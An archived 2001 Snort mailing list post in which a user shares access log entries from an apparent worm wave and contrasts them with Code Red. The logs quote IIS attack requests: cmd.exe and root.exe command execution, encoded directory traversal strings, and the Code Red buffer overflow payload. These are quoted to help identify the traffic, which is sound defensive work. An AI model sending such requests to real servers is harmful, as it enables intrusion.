Snort mailing list archives

RE: Code Green???

From: Ed Kasky <ed () esson net>
Date: Tue, 18 Sep 2001 08:52:03 -0700

Mine started at about 6:00 am PDT this morning. I checked my access log aswell and these are very different from the code red attacks:

216.112.222.12 - - [18/Sep/2001:06:26:11 -0700] "GET/scripts/root.exe?/c+dir HTTP/1.0" 404 328

216.112.222.12 - - [18/Sep/2001:06:26:12 -0700] "GET /MSADC/root.exe?/c+dirHTTP/1.0" 404 326

216.112.222.12 - - [18/Sep/2001:06:26:13 -0700] "GET/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336

216.112.222.12 - - [18/Sep/2001:06:26:14 -0700] "GET/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336

216.112.222.12 - - [18/Sep/2001:06:26:16 -0700] "GET/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350

216.112.222.12 - - [18/Sep/2001:06:26:17 -0700] "GET/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dirHTTP/1.0" 404 367

216.112.222.12 - - [18/Sep/2001:06:26:18 -0700] "GET/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dirHTTP/1.0" 404 367

216.112.222.12 - - [18/Sep/2001:06:26:19 -0700] "GET/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dirHTTP/1.0" 404 383

216.112.222.12 - - [18/Sep/2001:06:26:23 -0700] "GET/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

216.112.222.12 - - [18/Sep/2001:06:26:25 -0700] "GET/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

216.112.222.12 - - [18/Sep/2001:06:26:29 -0700] "GET/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349

216.112.222.12 - - [18/Sep/2001:06:26:30 -0700] "GET/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349


A code red looks like this:

149.225.56.209 - - [18/Sep/2001:03:34:28 -0700] "GET/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=aHTTP/1.0" 500 648



At 10:16 AM 9/18/2001 -0500, Steve Halligan wrote:

I am getting loads of this too.  I just set up a honeypot to catch it.



_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users

Current thread:

Re: Code Green???, (continued)
- Re: Code Green??? richard (Sep 18)
  - Re: Code Green??? Dushyanth Harinath (Sep 18)
    - Re: Code Green??? Larry E. Smith Jr. (Sep 18)
- RE: Code Green??? Jim Howard (Sep 18)
  - RE: Code Green??? Erek Adams (Sep 18)
- RE: Code Green??? Jim Howard (Sep 18)
- RE: Code Green??? Steve Halligan (Sep 18)
- RE: Code Green??? Lodin, Steven {GZ-Q~Mannheim} (Sep 18)
  - RE: Code Green??? richard (Sep 18)
- RE: Code Green??? Steve Halligan (Sep 18)
- RE: Code Green??? Ed Kasky (Sep 18)
- RE: Code Green??? Steve Halligan (Sep 18)
  - Re: Code Green??? Ian Cudlip (Sep 18)
- RE: Code Green??? John Steniger (Sep 18)
- RE: Code Green??? Tim Parker (Sep 18)
  - Re: Code Green??? Ian Cudlip (Sep 18)
- RE: Code Green??? Missaghi, Shawn (Sep 18)
- RE: Code Green??? Dominick, David (Sep 18)
- RE: Code Green??? Patrick Coomans (Sep 18)